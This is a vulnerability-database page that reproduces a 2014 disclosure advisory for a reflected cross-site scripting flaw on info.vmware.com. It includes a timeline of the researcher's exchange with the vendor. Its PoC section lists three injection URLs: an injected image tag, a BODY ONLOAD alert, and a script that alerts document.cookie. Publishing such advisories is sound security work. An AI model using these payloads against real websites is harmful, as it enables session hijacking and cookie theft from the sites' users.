Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

info.vmware.com Cross Site Scripting

🗓️ 28 May 2014 00:00:00Reported by Robert GarciaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

info.vmware.com Cross-Site Script Vulnerability (XSS) Advisory. Website prone to injection of unauthorized javascript code

Code
`  
Advisory: info.vmware.com – Cross-Site Script Vulnerability (XSS) Advisory  
ID: VMware Support Request 14479234605  
Author: Roberto Garcia  
Affected Software: Successfully tested on info.vmware.com Vendor URL:  
htt://info.vmware.com Vendor Status: informed  
  
  
==========================  
Vulnerability Description  
==========================  
  
The website "info.vmware.com" is prone to a XSS vulnerability.  
  
This vulnerability involves the ability to inject arbitrary and unauthorized  
javascript code. A malicious script inserted into a page in this manner can  
hijack the user’s session, submit unauthorized transactions as the user,  
steal confidential information, or simply deface the page.  
  
  
==========================  
PoC-Exploit  
==========================  
  
http://info.vmware.com/content/26338_nsx_apj_cities?src=%22%3E%3Cimg%20src=%  
22http://goo.gl/vxAvX3%22%3E  
  
http://info.vmware.com/content/26338_nsx_apj_cities?src=%22%3E%3CBODY%20ONLO  
AD=alert%28%22XSSby@1GbDeInfo%22%29%3E  
  
http://info.vmware.com/content/26338_nsx_apj_cities?src=%E2%80%9C%3E%3Cscrip  
t%3Ealert%28document.cookie%29%3C/script%3E  
  
PoC video is available at  
https://mega.co.nz/#F!78QXhLJJ!jtHAxJWjsJZlEE0gnSXeFw  
  
  
==========================  
Solution  
==========================  
  
None  
  
  
==========================  
Disclosure Timeline  
==========================  
  
- May 2014. I enrolled in an online course. They sent me an email  
confirmation to see more information. I found a XSS in the URL where vmware  
had the additional info.  
- Report vuln May 20, 2014 via email to [email protected]  
- Asked by email to send a POC. I sent a video with the POC.  
- May 21, 2014. Asked by email to send the original email.  
- May 23, 2014. Replied by email that the original address  
([email protected]) does not belong to them, then vmware.com is not  
affected. I said them that the vuln was about info.vmware.com, it was not  
the email address.  
- Asked by email to go ahead and close this case on my behalf.  
- Closed as fixed, still vulnerable.  
  
==========================  
Credits  
==========================  
  
Vulnerability found and advisory written by Roberto Garcia  
  
  
  
  
Best regards.  
  
Roberto Garcia Amoriz  
Linkedin: Roberto Garcia  
Web: http://www.1gbdeinformacion.com  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 May 2014 00:00Current
7.4High risk
Vulners AI Score7.4
vmwarecross-site scriptxssinjectionunauthorized accesssession hijackinginformation theftwebsite defacementvulnerabilityadvisoryroberto garciadisclosure timeline
25